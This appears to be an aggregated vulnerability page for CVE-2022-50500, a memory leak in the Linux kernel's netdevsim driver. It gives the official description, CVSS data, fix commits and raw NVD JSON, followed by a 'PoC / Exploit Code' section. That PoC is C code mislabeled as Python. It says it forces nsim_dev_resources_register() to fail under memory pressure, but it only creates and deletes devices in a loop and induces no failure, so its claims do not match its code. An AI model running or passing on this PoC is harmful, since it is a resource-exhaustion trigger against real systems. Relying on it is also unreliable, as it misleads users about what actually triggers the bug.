CVE-2022-50500

Description

In the Linux kernel, the following vulnerability has been resolved: netdevsim: fix memory leak in nsim_drv_probe() when nsim_dev_resources_register() failed If some items in nsim_dev_resources_register() fail, memory leak will occur. The following is the memory leak information. unreferenced object 0xffff888074c02600 (size 128): comm "echo", pid 8159, jiffies 4294945184 (age 493.530s) hex dump (first 32 bytes): 40 47 ea 89 ff ff ff ff 01 00 00 00 00 00 00 00 @G.............. ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ................ backtrace: [<0000000011a31c98>] kmalloc_trace+0x22/0x60 [<0000000027384c69>] devl_resource_register+0x144/0x4e0 [<00000000a16db248>] nsim_drv_probe+0x37a/0x1260 [<000000007d1f448c>] really_probe+0x20b/0xb10 [<00000000c416848a>] __driver_probe_device+0x1b3/0x4a0 [<00000000077e0351>] driver_probe_device+0x49/0x140 [<0000000054f2465a>] __device_attach_driver+0x18c/0x2a0 [<000000008538f359>] bus_for_each_drv+0x151/0x1d0 [<0000000038e09747>] __device_attach+0x1c9/0x4e0 [<00000000dd86e533>] bus_probe_device+0x1d5/0x280 [<00000000839bea35>] device_add+0xae0/0x1cb0 [<000000009c2abf46>] new_device_store+0x3b6/0x5f0 [<00000000fb823d7f>] bus_attr_store+0x72/0xa0 [<000000007acc4295>] sysfs_kf_write+0x106/0x160 [<000000005f50cb4d>] kernfs_fop_write_iter+0x3a8/0x5a0 [<0000000075eb41bf>] vfs_write+0x8f0/0xc80

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:linux:linux_kernel:6.1:rc1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:linux:linux_kernel:6.1:rc2:*:*:*:*:*:* - VULNERABLE

Linux Kernel (netdevsim驱动受影响版本，具体版本范围需参考补丁提交记录)

修复提交: 6b1da9f7126f05e857da6db24c6a04aa7974d644

修复提交: 7c4957fe40e2a628b7cceaf4c9bfb5b701774d05

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC for CVE-2022-50500 - Linux kernel netdevsim memory leak
// This PoC triggers the memory leak by creating a netdevsim device
// and forcing nsim_dev_resources_register() to fail mid-way.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>

#define NETDEVSIM_BUS_PATH "/sys/bus/netdevsim/new_device"

/*
 * Trigger memory leak in nsim_drv_probe() by repeatedly creating
 * netdevsim devices under memory pressure conditions.
 * When nsim_dev_resources_register() fails partially, allocated
 * resources are not freed, causing memory leak.
 */
int main(int argc, char *argv[]) {
    int fd, ret;
    char buf[64];
    int dev_num = 0;

    printf("CVE-2022-50500 PoC - netdevsim memory leak\n");

    /* Load netdevsim module if not loaded */
    ret = system("modprobe netdevsim");
    if (ret != 0) {
        fprintf(stderr, "Failed to load netdevsim module\n");
        return 1;
    }

    /* Create multiple netdevsim devices to trigger repeated probing */
    for (dev_num = 0; dev_num < 1000; dev_num++) {
        snprintf(buf, sizeof(buf), "%d", dev_num);

        fd = open(NETDEVSIM_BUS_PATH, O_WRONLY);
        if (fd < 0) {
            fprintf(stderr, "Cannot open %s (need root)\n", NETDEVSIM_BUS_PATH);
            break;
        }

        ret = write(fd, buf, strlen(buf));
        close(fd);

        if (ret < 0) {
            /* Write failure may indicate resource registration failure,
             * which triggers the memory leak path */
            fprintf(stderr, "Device %d creation failed (triggering leak path)\n", dev_num);
        }

        /* Remove the device to free other resources, keeping leaked memory */
        snprintf(buf, sizeof(buf),
                 "/sys/bus/netdevsim/devices/netdevsim%d/delete", dev_num);
        fd = open(buf, O_WRONLY);
        if (fd >= 0) {
            write(fd, "1", 1);
            close(fd);
        }
    }

    printf("Done. Check kernel logs for memory leak warnings.\n");
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2022-50500
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2022-50500
[3] CVE Details https://www.cvedetails.com/cve/CVE-2022-50500/
[4] VulDB https://vuldb.com/cve/CVE-2022-50500
[5] https://git.kernel.org/stable/c/6b1da9f7126f05e857da6db24c6a04aa7974d644
[6] https://git.kernel.org/stable/c/7c4957fe40e2a628b7cceaf4c9bfb5b701774d05

Raw JSON Data

JSON

{"cve": {"id": "CVE-2022-50500", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:47.153", "lastModified": "2026-01-22T19:53:01.873", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetdevsim: fix memory leak in nsim_drv_probe() when nsim_dev_resources_register() failed\n\nIf some items in nsim_dev_resources_register() fail, memory leak will\noccur. The following is the memory leak information.\n\nunreferenced object 0xffff888074c02600 (size 128):\n comm \"echo\", pid 8159, jiffies 4294945184 (age 493.530s)\n hex dump (first 32 bytes):\n 40 47 ea 89 ff ff ff ff 01 00 00 00 00 00 00 00 @G..............\n ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ................\n backtrace:\n [<0000000011a31c98>] kmalloc_trace+0x22/0x60\n [<0000000027384c69>] devl_resource_register+0x144/0x4e0\n [<00000000a16db248>] nsim_drv_probe+0x37a/0x1260\n [<000000007d1f448c>] really_probe+0x20b/0xb10\n [<00000000c416848a>] __driver_probe_device+0x1b3/0x4a0\n [<00000000077e0351>] driver_probe_device+0x49/0x140\n [<0000000054f2465a>] __device_attach_driver+0x18c/0x2a0\n [<000000008538f359>] bus_for_each_drv+0x151/0x1d0\n [<0000000038e09747>] __device_attach+0x1c9/0x4e0\n [<00000000dd86e533>] bus_probe_device+0x1d5/0x280\n [<00000000839bea35>] device_add+0xae0/0x1cb0\n [<000000009c2abf46>] new_device_store+0x3b6/0x5f0\n [<00000000fb823d7f>] bus_attr_store+0x72/0xa0\n [<000000007acc4295>] sysfs_kf_write+0x106/0x160\n [<000000005f50cb4d>] kernfs_fop_write_iter+0x3a8/0x5a0\n [<0000000075eb41bf>] vfs_write+0x8f0/0xc80"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.17", "versionEndExcluding": "6.0.7", "matchCriteriaId": "F34DC795-2F6B-4DC1-AFD7-A6C124134954"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.1:rc1:*:*:*:*:*:*", "matchCriteriaId": "E7E331DA-1FB0-4DEC-91AC-7DA69D461C11"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.1:rc2:*:*:*:*:*:*", "matchCriteriaId": "17F0B248-42CF-4AE6-A469-BB1BAE7F4705"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/6b1da9f7126f05e857da6db24c6a04aa7974d644", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7c4957fe40e2a628b7cceaf4c9bfb5b701774d05", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}